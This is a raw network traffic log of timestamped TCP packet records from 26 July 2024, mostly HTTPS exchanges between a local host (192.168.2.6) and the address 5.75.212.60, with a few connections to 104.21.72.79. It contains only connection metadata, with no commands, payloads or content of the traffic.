Jul 26, 2024 12:57:23.994354010 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.994375944 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.994447947 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.994461060 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.994496107 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.994530916 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.002897024 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.002921104 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.002993107 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.003005981 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.003041029 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.003062010 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.009207010 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.009227991 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.009301901 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.009313107 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.009347916 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.009370089 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.012593031 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.012614965 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.012695074 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.012706995 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.012769938 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.048451900 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.048475981 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.048544884 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.048605919 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.048732042 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.048732042 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.051047087 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.051064968 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.051146984 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.051162958 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.051223993 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.075506926 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.075526953 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.075735092 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.075797081 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.076018095 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.076940060 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.076957941 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.077025890 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.077040911 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.077099085 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.085525990 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.085544109 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.085619926 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.085632086 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.085690022 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.093919992 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.093938112 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.094012976 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.094027042 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.094083071 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.100132942 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.100151062 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.100222111 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.100234032 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.100284100 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.103873968 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.103899002 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.103988886 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.104008913 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.104062080 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.147939920 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.147969007 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.148051977 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.148124933 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.148163080 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.148185968 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.148358107 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.148377895 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.148425102 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.148437977 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.148473978 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.148500919 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.171155930 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.171178102 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.171367884 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.171432018 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.171490908 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.172431946 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.172452927 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.172523022 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.172535896 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.172612906 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.176392078 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.176413059 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.176490068 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.176501989 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.176564932 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.186074972 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.186099052 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.186158895 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.186172962 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.186213017 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.186235905 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.192322016 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.192342997 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.192401886 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.192415953 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.192455053 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.192476034 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.196320057 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.196341038 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.196410894 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.196424007 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.196480989 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.205101967 CEST	443	60800	104.21.72.79	192.168.2.6
Jul 26, 2024 12:57:24.205183029 CEST	60800	443	192.168.2.6	104.21.72.79
Jul 26, 2024 12:57:24.207181931 CEST	60800	443	192.168.2.6	104.21.72.79
Jul 26, 2024 12:57:24.207195997 CEST	443	60800	104.21.72.79	192.168.2.6
Jul 26, 2024 12:57:24.207550049 CEST	443	60800	104.21.72.79	192.168.2.6
Jul 26, 2024 12:57:24.244992971 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.245013952 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.245068073 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.245083094 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.245120049 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.245178938 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.245860100 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.245881081 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.245942116 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.245948076 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.246000051 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.256511927 CEST	60800	443	192.168.2.6	104.21.72.79
Jul 26, 2024 12:57:24.261137009 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.261162043 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.261234999 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.261246920 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.261302948 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.262005091 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.262027025 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.262077093 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.262088060 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.262136936 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.262159109 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.262993097 CEST	60800	443	192.168.2.6	104.21.72.79
Jul 26, 2024 12:57:24.263031006 CEST	60800	443	192.168.2.6	104.21.72.79
Jul 26, 2024 12:57:24.263401985 CEST	443	60800	104.21.72.79	192.168.2.6
Jul 26, 2024 12:57:24.267899036 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.267937899 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.268050909 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.268074036 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.268135071 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.276272058 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.276298046 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.276354074 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.276364088 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.276412010 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.285018921 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.285068989 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.285101891 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.285109043 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.285177946 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.285917044 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.285964966 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.285996914 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.286001921 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.286052942 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.333326101 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.333348036 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.333805084 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.333868027 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.333966017 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.336908102 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.336925030 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.337012053 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.337025881 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.337081909 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.354341030 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.354357004 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.354531050 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.354540110 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.354589939 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.355346918 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.355360985 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.355428934 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.355433941 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.355477095 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.369410038 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.369425058 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.369601011 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.369626999 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.369762897 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.381383896 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.381400108 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.381515026 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.381530046 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.381678104 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.395972013 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.395989895 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.396073103 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.396085978 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.396239996 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.404903889 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.404920101 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.405006886 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.405019045 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.405075073 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.431441069 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.431468964 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.431763887 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.431828022 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.432009935 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.440413952 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.440437078 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.440691948 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.440705061 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.440754890 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.450737953 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.450762033 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.450867891 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.450877905 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.451034069 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.457674026 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.457690954 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.457814932 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.457850933 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.457901001 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.463418961 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.463438988 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.463660955 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.463670015 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.463728905 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.468743086 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.468766928 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.468851089 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.468859911 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.468900919 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.473561049 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.473582983 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.473664045 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.473673105 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.473720074 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.477929115 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.477946997 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.478027105 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.478039980 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.478095055 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.518527031 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.518548965 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.519025087 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.519088984 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.519175053 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.522175074 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.522195101 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.522273064 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.522286892 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.522340059 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.538866997 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.538881063 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.539084911 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.539146900 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.539230108 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.543636084 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.543651104 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.543713093 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.543719053 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.543761969 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.548022985 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.548038006 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.548101902 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.548105955 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.548147917 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.558218956 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.558233976 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.558301926 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.558305979 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.558357000 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.562166929 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.562181950 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.562273026 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.562283039 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.562336922 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.565187931 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.565203905 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.565274000 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.565284014 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.565336943 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.608267069 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.608362913 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.608500957 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.608540058 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.608593941 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.611820936 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.611855030 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.611891031 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.611900091 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.611931086 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.611953020 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.629930973 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.629976034 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.630145073 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.630171061 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.630219936 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.633322954 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.633377075 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.633414030 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.633419037 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.633451939 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.633470058 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.636023998 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.636075974 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.636101007 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.636106014 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.636151075 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.636151075 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.648649931 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.648669958 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.648741007 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.648753881 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.648807049 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.651518106 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.651536942 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.651606083 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.651618004 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.651673079 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.655378103 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.655397892 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.655427933 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.655461073 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.655481100 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.655502081 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.655503988 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.655529022 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.655564070 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.655711889 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.655741930 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.692816973 CEST	60803	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.692903996 CEST	443	60803	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:24.692996979 CEST	60803	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.693197966 CEST	60803	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:24.693228960 CEST	443	60803	5.75.212.60	192.168.2.6
